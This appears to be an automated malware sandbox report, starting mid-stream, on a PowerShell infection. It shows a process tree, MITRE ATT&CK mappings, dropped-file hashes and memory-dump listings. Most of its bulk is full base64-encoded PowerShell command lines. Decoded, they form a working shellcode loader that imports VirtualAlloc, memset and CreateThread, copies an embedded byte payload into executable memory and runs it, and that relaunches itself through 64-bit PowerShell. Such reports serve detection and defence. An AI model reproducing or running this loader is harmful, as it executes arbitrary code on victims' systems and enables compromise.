ANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABzAHUAawAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAdQBrACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkADUALAAwAHgAYgBhACwAMAB4ADQANwAsADAAeAA1AGYALAAwAHgANwA5ACwAMAB4ADYANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAYgAyACwAMAB4AGEAMwAsADAAeAA5ADEALAAwAHgAZQA4ACwAMAB4ADMAYwAsADAAeAA1AGMALAAwAHgANgAyACwAMAB4ADkANwAsADAAeAAwAGQALAAwAHgAOABlACwAMAB4ADAANgAsADAAeABkAGMALAAwAHgAMwBmACwAMAB4ADEAZQAsADAAeAA0AGMALAAwAHgAYgAwACwAMAB4AGIAMwAsADAAeABkADUALAAwAHgAMAAwACwAMAB4ADIAMQAsADAAeAA0ADIALAAwAHgAMABjACwAMAB4ADkANQAsADAAeABiADYALAAwAHgAZABmACwAMAB4AGIAZAAsADAAeABmAGUALAAwAHgANAA3ACwAMAB4ADYAOAAsADAAeAAwAGIALAAwAHgAZAA5ACwAMAB4ADYANgAsADAAeAA1ADYALAAwAHgAMgAwACwAMAB4ADEAOQAsADAAeABlADgALAAwAHgAMgBhACwAMAB4ADMAYgAsADAAeAA0AGUALAAwAHgAYwBhACwAMAB4ADEAMwAsADAAeABmADQALAAwAHgAOAAzACwAMAB4ADAAYgAsADAAeAA1ADQALAAwAHgANAAyACwAMAB4AGUAOQAsADAAeABlADQALAAwAHgAMAA4ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAYQA5ACwAMAB4AGIAYwAsADAAeAAyADcALAAwAHgAZABlACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAZQA3ACwAMAB4ADUANAAsADAAeABjADkALAAwAHgAYwA1ACwAMAB4ADgAMgAsADAAeABhAGIALAAwAHgAYgBlACwAMAB4ADcAOQAsADAAeAA4AGMALAAwAHgAZgBiACwAMAB4ADYAZgAsADAAeAAwAGEALAAwAHgAYwA2ACwAMAB4AGUAMwAsADAAeAAwADQALAAwAHgANQA0ACwAMAB4AGYANwAsADAAeAAxADIALAAwAHgAYwA4ACwAMAB4AGUAMQAsADAAeAAzAGUALAAwAHgANgAwACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgANABiACwAMAB4AGIAZAAsADAAeABhADEALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeABiAGYALAAwAHgANgAzACwAMAB4ADUAMgAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4ADQANAAsADAAeAA5ADkALAAwAHgAYQA3ACwAMAB4ADgAMwAsADAAeAA5AGMALAAwAHgAOQA5ACwAMAB4ADUANwAsADAAeABmADYALAAwAHgAZAA2ACwAMAB4AGQAYQAsADAAeABlAGEALAAwAHgAMAAxACwAMAB4ADIAZAAsADAAeABhADEALAAwAHgAMwAwACwAMAB4ADgANwAsADAAeABiADIALAAwAHgAMAAxACwAMAB4AGIAMgAsADAAeAAzAGYALAAwAHgAMQA3ACwAMAB4AGIAMAAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZABjACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgAYQAyACwAMAB4AGUAMwAsADAAeAA2ADIALAAwAHgAYgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgAOAA1ACwAMAB4ADEANwAsADAAeAA1ADcALAAwAHgAMgBhACwAMAB4AGEAMgAsADAAeABiADMALAAwAHgAMwBjACwAMAB4AGUAOAAsADAAeABjAGIALAAwAHgAZQAyACwAMAB4ADkAOAAsADAAeAA1AGYALAAwAHgAZgAzACwAMAB4AGYANQAsADAAeAA0ADQALAAwAHgAMwBmACwAMAB4ADUAMQAsADAAeAA3AGQALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeABlADUALAAwAHgANwBlACwAMAB4ADcAOQAsADAAeAA1ADcALAAwAHgAYgBiACwAMAB4AGUAOAAsADAAeABlAGIALAAwAHgAYwBkACwAMAB4ADMAMAAsADAAeABlADkALAAwAHgAOQBiACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgANABhACwAMAB4ADEANAAsADAAeABiADMALAAwAHgAZgBmACwAMAB4ADgAZAAsADAAeAA1AGIALAAwAHgAZQBlACwAMAB4ADMAMQAsADAAeAA0ADkALAAwAHgAZgAwACwAMAB4ADQAMwAsADAAeAA2ADEALAAwAHgAMwBlACwAMAB4AGEANAAsADAAeAAwAGIALAAwAHgAYgBmACwAMAB4ADkANgAsADAAeAAzADMALAAwAHgANgBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAOQA3ACwAMAB4ADIAMQAsADAAeABkADUALAAwAHgAZQBmACwAMAB4ADQANAAsADAAeAA5ADYALAAwAHgANAAxACwAMAB4ADYAMAAsADAAeAA3ADUALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADEAOAAsADAAeAA5ADIALAAwAHgANgA4ACwAMAB4ADEANAAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4ADUAYQAsADAAeAAwADAALAAwAHgAMAA3ACwAMAB4AGIAYwAsADAAeABiADcALAAwAHgAYgBkACwAMAB4ADgAMwAsADAAeAAyADYALAAwAHgAYQA5ACwAMAB4ADYAOQAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADYAMAAsADAAeABlADEALAAwAHgANABlACwAMAB4ADQAMwAsADAAeAAwADIALAAwAHgAMwA0ACwAMAB4AGMAMAAsADAAeAAxADIALAAwAHgAZAA1ACwAMAB4ADQAMwAsADAAeAAxADEALAAwAHgAZQBmACwAMAB4ADIAYwAsADAAeABlADAALAAwAHgANgA5ACwAMAB4ADAAZgAsADAAeAAxAGYALAAwAHgAOQAwACwAMAB4AGQAZQAsADAAeAA4ADYALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAxAGYALAAwAHgANABkACwAMAB4AGIANwAsADAAeABlADEALAAwAHgAOABjACwAMAB4ADAANgAsADAAeABjADgALAAwAHgAZABmACwAMAB4AGQAYQAsADAAeAA1ADMALAAwAHgAOQBiACwAMAB4ADQAYwAsADAAeAA0ADkALAAwAHgAMABiACwAMAB4ADQAZgAsADAAeAAyADUALAAwAHgAMAA1ACwAMAB4ADUAOAAsADAAeAAzAGEALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAA2ADEALAAwAHgAMQAwACwAMAB4ADYAMQAsADAAeAA3AGEALAAwAHgAOQA0ACwAMAB4AGMANAAsADAAeABlADYALAAwAHgAZgBhACwAMAB4ADkAYgAsADAAeABmAGEALAAwAHgAZgA2ACwAMAB4ADcAMwAsADAAeAAzAGIALAAwAHgAOQAwACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAZAA2ACwAMAB4ADcAYQAsADAAeABhAGQALAAwAHgAYgBiACwAMAB4ADUAMwAsADAAeABjADMALAAwAHgAYwBmACwAMAB4AGIAZAAsADAAeAA2ADMALAAwAHgAMQBlACwAMAB4AGIAYwAsADAAeAA5ADIALAAwAHgAYwA4ACwAMAB4AGYAMgAsADAAeAAxADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABmADIALAAwAHgAOAAxACwAMAB4ADAANwAsADAAeABlADMALAAwAHgAMgBlACwAMAB4ADMANAAsADAAeAAzADcALAAwAHgANgBlACwAMAB4AGMANwAsADAAeAA1AGYALAAwAHgAMwBmACwAMAB4ADgAMgAsADAAeABlADcALAAwAHgAOQBmACwAMAB4ADUANwAsADAAeABlADEALAAwAHgAMQA3ACwAMAB4AGEAYQAsADAAeAA0ADcALAAwAHgAMQA2ACwAMAB4ADAAMgAsADAAeAA5AGEALAAwAHgAZgAyACwAMAB4ADIANAAsADAAeABjADUALAAwAHgAZAA1ACwAMAB4ADQAOQAsADAAeAAxADQALAAwAHgANAAwACwAMAB4AGUAOQAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4ADIAZAAsADAAeAA3AGQALAAwAHgAOAA2ACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgANwBkACwAMAB4AGUAZQAsADAAeABkADQALAAwAHgAYQBkACwAMAB4ADMAZAAsADAAeABlAGUALAAwAHgAOAA3ACwAMAB4AGMANQAsADAAeABlADUALAAwAHgANABhACwAMAB4ADcANAAsADAAeABmADMALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeABlADgALAAwAHgAYQA4ACwAMAB4ADQANgAsADAAeABlAGUALAAwAHgAZQA4ACwAMAB4ADEAOAAsADAAeAAwADEALAAwAHgAZgAwACwAMAB4AGQANgAsADAAeABhADYALAAwAHgAZAAxACwAMAB4AGEAMwAsADAAeAA0ADAALAAwAHgAYwBmACwAMAB4AGMAMwAsADAAeABkADUALAAwAHgAZQA0ACwAMAB4AGUAZAAsADAAeAAxAGIALAAwAHgAMABjACwAMAB4ADcAMwAsADAAeAAzADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAYgA1ACwAMAB4ADUAOQAsADAAeABiADgALAAwAHgAOABkACwAMAB4ADcAYQAsADAAeAAyAGMALAAwAHgAZABiACwAMAB4AGQANgAsADAAeABiADkALAAwAHgAOQAwACwAMAB4AGMAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGQAMAAsADAAeABmADQALAAwAHgANgAwACwAMAB4ADAANAAsADAAeAAxAGQALAAwAHgAMgA0ACwAMAB4AGIAMgAsADAAeAA0ADAALAAwAHgANQA5ACwAMAB4ADEANgAsADAAeAA4ADUALAAwAHgAOQA0ACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZAA3ACwAMAB4AGQAZAAsADAAeABjADcAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHUAUwBsAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHUAUwBsAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHUAUwBsAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2284
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n0pga5kz\n0pga5kz.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4616
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA856.tmp" "c:\Users\Admin\AppData\Local\Temp\n0pga5kz\CSCC70A3FD123E444718895F6351AC3B83.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA856.tmp

Filesize
1KB

MD5
152f3e760c6f3c2bb8fa98a038e366ca

SHA1
c2c29606e089a5d9108d0414760fe22b985b15b5

SHA256
ebe33f78bf834dd2b7d243e2f60d38bc6cdbea3b22e0d2e2d604ab8542f4392b

SHA512
242526faf14d92c36992b8f79ffecff9c6ef40f00a6a8f990fc8345b29bb516a49ff51b4e591d3489a83d3778337f8b4e481e88468ee766f18078fe8cbd5142d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bv3axuca.pia.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n0pga5kz\n0pga5kz.dll

Filesize
3KB

MD5
d30b3b7bc096b26f5caaa39f0b366683

SHA1
4b480adf0c7f2f630fb07f968b911e50e839d530

SHA256
683b4f9389be9936cadd7b4feb6deae1e87a714747aa4e1429fa0ae415f9d61b

SHA512
1fece3f7d420e3f91b090a8d41187468a4bd2781df6625fbc6adcf1944a97a72b5178df6e3cb65355b5f696ec3193c097daf4188cb26b71b465c83b12dd71d3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n0pga5kz\CSCC70A3FD123E444718895F6351AC3B83.TMP

Filesize
652B

MD5
9bf8ef26ee06cdc8ffdf0bdd0b21be41

SHA1
25dd3e2115823eb7e827db616043be95fb28166c

SHA256
7c1cce8c08b4e407e7c0e7ff54885d2b568c13ff1fd6202821de219b1b49e6cc

SHA512
262e3a8a4586c4cfb4c5241ef17f26de2b060626a283a92b2efb3002f7928d0ac2b29edf48c45074416c65620ccdc43d25a8a742bb399531e8bb9f9f6645993c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n0pga5kz\n0pga5kz.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n0pga5kz\n0pga5kz.cmdline

Filesize
369B

MD5
d90fe37c9dfaca86cfefce2ebf6afc60

SHA1
be537ff8efa304e75cae3b319d3074d4db372a3e

SHA256
d77bd16e07e6823f547e3c4c54be510f8e6deb552ea92e8589060da895e654aa

SHA512
6ae4f891b20fc88ebeb52cb50e75090764e1627c175521d68e8043d179f1aa9df287094b0c8277ed39d6c662be6e6096a9eefec68a971762ce7e0adb739f7d11

Download Submit
memory/208-70-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/208-18-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/208-23-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/208-24-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/2284-49-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/2284-35-0x0000000005630000-0x0000000005C58000-memory.dmp

Filesize
6.2MB

Download
memory/2284-37-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download
memory/2284-48-0x0000000005D50000-0x00000000060A4000-memory.dmp

Filesize
3.3MB

Download
memory/2284-67-0x00000000075A0000-0x00000000075A1000-memory.dmp

Filesize
4KB

Download
memory/2284-50-0x0000000006400000-0x000000000644C000-memory.dmp

Filesize
304KB

Download
memory/2284-51-0x0000000007C20000-0x000000000829A000-memory.dmp

Filesize
6.5MB

Download
memory/2284-52-0x00000000068F0000-0x000000000690A000-memory.dmp

Filesize
104KB

Download
memory/2284-36-0x0000000005510000-0x0000000005532000-memory.dmp

Filesize
136KB

Download
memory/2284-38-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/2284-34-0x0000000004E00000-0x0000000004E36000-memory.dmp

Filesize
216KB

Download
memory/2284-65-0x0000000006960000-0x0000000006968000-memory.dmp

Filesize
32KB

Download
memory/4500-12-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/4500-11-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/4500-0-0x00007FF909133000-0x00007FF909135000-memory.dmp

Filesize
8KB

Download
memory/4500-68-0x00007FF909133000-0x00007FF909135000-memory.dmp

Filesize
8KB

Download
memory/4500-69-0x00007FF909130000-0x00007FF909BF1000-memory.dmp

Filesize
10.8MB

Download
memory/4500-6-0x000001EB2B8D0000-0x000001EB2B8F2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads